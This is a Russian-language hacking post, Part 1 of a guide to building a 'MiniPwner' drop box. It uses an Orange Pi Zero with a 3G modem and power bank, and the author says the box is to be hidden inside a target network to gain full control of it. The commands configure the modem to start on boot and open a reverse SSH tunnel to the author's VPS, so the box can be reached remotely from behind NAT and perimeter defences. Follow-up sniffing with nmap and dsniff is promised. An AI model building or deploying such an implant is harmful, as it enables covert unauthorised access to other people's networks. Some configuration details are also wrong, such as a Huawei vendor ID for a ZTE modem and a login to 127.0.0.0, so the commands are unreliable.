Получаем 100% доступ к сети Часть 1.

Получаем 100% доступ к сети Часть 1.

B1ACK_GARANT

В этой статье я покажу как сделать такое устройство.

Привет, Анон. Сегодня я расскажу как подготовить устройство, которое позволит получить полный контроль над сетью. Достаточно незаметно разместить MiniPwner и можно удаленно проводить различные атаки. В этой статье я покажу как сделать такое устройство, а в следующей – расскажу об эксплуатации. Вы только вдумайтесь, что незаметно поместив это устройство, можно получить полный контроль над сетью на 24 часа и больше. В зависимости от источника питания.

Финальный вариант

Что нужно для работы?

  1. Orange Pi Zero
  2. Power bank
  3. USB 3G-модем (я использовал ZTE MF100, но чтобы не проводить дополнительных танцев с бубном смотрите с поддержкой Linux ОС)
  4. SIM-карта.
  5. Ethernet-кабель.
  6. MicroSD-карта.

Шаг 1. Подготовка Orange Pi Zero

Для начала нам необходимо перейти на сайт и скачать операционную систему Armbian Stretch. Далее распаковать архив в папку и записать образ на MicroSD-карту. Об этом есть много информации в интернете. На Windows это можно сделать с помощью утилиты Win32DiskImager. Достаточно выбрать образ и путь и начать запись кнопкой "Write". Выглядит это примерно так.

Запись образа на SD-карту

После этого устанавливаем карту в Orange Pi Zero, подключаем в локальную сеть и подаем питание (желательно это делать через Powerbank или USB hub, чтоб на выходе получить 5В/1А). Ждем некоторое время. Дальше необходимо посмотреть на роутере или просканировать сеть для получения IP-адреса. Подключаемся по SSH. Это можно выполнить, как с отдельного клиента, так и с командной строки. Стандартные данные для авторизации:

Логин root 
Пароль 1234

После подключения нужно повторно ввести пароль и создать нового юзера. В итоге должно получиться вот так:

Создание нового пользователя

Далее перезагружаем плату. Для этого нужно выполнить команду:

reboot

После нового подключения необходимо провести обновление системы с помощью таких команд:

apt-get update 
apt-get upgrade

Аналогично выполняем перезагрузку и повторно подключаемся. Затем начинается самое интересное.

Шаг 2. Подключение 3G-модема

Модем нам нужен для того, чтоб мы могли получать удаленный доступ к сети, которая не имеет выход в интернет. Таким образом, это позволит нам управлять работой сети с удобного места.

Подключаем модем и устанавливаем необходимые пакеты для работы:

sudo apt-get install usb-modeswitch ppp

Далее необходимо проверить список подключенных устройств. Это можно сделать с помощью команды:

lsusb
Список подключенных устройств

Видно, что там есть модем ZTE WCDMA Technologies MSM MF110/MF627/MF636. Далее необходимо изменить настройки:

nano /etc/usb_modeswitch.conf

После открытия в конце документа нужно добавить:

DefaultVendor=0x12d1
DefaultProduct=0x155b
MessageContent="55534243123456780000000000000011060000000000000000000000000000"
MessageEndpoint=0x01
CheckSuccess=5

Далее перезапускаем модем и смотрим, работает все или нет. 

usb_modeswitch -c /etc/usb_modeswitch.conf

Необходимо сделать так, чтобы модем автоматически переходил в нужный режим. Выполняем команду:

nano /etc/rc.local

И перед exit 0 добавляем:

usb_modeswitch -c /etc/usb_modeswitch.conf &

& - этот знак означает, что операция будет выполняться в фоновом режиме. Сохраняем и перезагружаем систему.

Выполним подключение 3G модема

# mkdir ~/usbmodem 
# cd ./usbmodem 
# wget http://sourceforge.net/projects/vim-n4n0/files/sakis3g.tar.gz 
# tar -xzvf sakis3g.tar.gz 
# sudo chmod +x sakis3g 
# sudo ./sakis3g --interactive

Далее с помощью интерактивного режима можем выполнить подключение к 3G сетям. Для этого следуем пунктам:

1. Connect with 3G -> 1. USB device -> 1. Mobile Connect -> 1. (internet.mts.ru)

Последний вариант будет выбран, исходя из вашего оператора.

Для автоматического подключения к сети нужно добавить соответствующую команду в /etc/rc.local. Для этого я запустил sakis3g без ключа --interactive, выбрал нужный идентификатор модема и APN. У меня получилось примерно так:

Попробуйте перезагрузить плату командой reboot, далее подключитесь к ней. Нужно проверить работает ли интерфейс модема (нужный интерфейс для 3G ppp0):

Проверка интерфейса

Шаг 3. Настройка SSH-туннеля.

После проделанного возникает вопрос: как получить доступ к устройству, если оно находится на охраняемом периметре, подключено к сети за NAT, а мобильный провайдер не выдает "белых" IP? В этом нам поможет дополнительный VPS-сервер и SSH-Туннель.

Для работы я арендовал сервер с внешним IP-адресом, настроил на нем пользователя root и разрешил в фаерволле доступ по SSH. Эти настройки зависят от вашего VPS-провайдера, и гайды обычно можно найти на его сайте.

Сначала выполним на нашей Orange Pi Zero команду:

ssh -f -N <username>@<address> -R 3722:127.0.0.1:22

Подставим вместо <username> - root (или какое имя пользователя вы используете на сервере), вместо <address> его IP. Дальше указываете порты для проброса туннеля. Вас попросит ввести пароль юзера сервера.

После этого вы сможете залогиниться на Orange со своего сервера БЕЗ ИСПОЛЬЗОВАНИЯ его IP-адреса, так как туннель является обратным, то есть инициируется нашим Orange. Логинимся так:

ssh <username>@127.0.0.0 -p 3722

Вместо username у нас будет root, а 3722 и есть выбранный вами порт в предыдущей команде.

Шаг 4. Пожинаем плоды

После подключения получаем вот такой результат. Где можно увидеть базовую информацию об устройстве. Дальше начинается все самое интересное.

Заключение

Это была самая сложная часть. В следующей я расскажу тебе, как можно работать с этой штукой. Например, как поставить nmap, dsniff, tcdump и другие. Все будет упираться только в твои фантазию и потребности. Все это зависит от твоих задач, так как наш Armbian поддерживает достаточно много. На этом все, ждите вторую часть, которая покажет, что умеет наш MiniPwner с Orange PI.

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org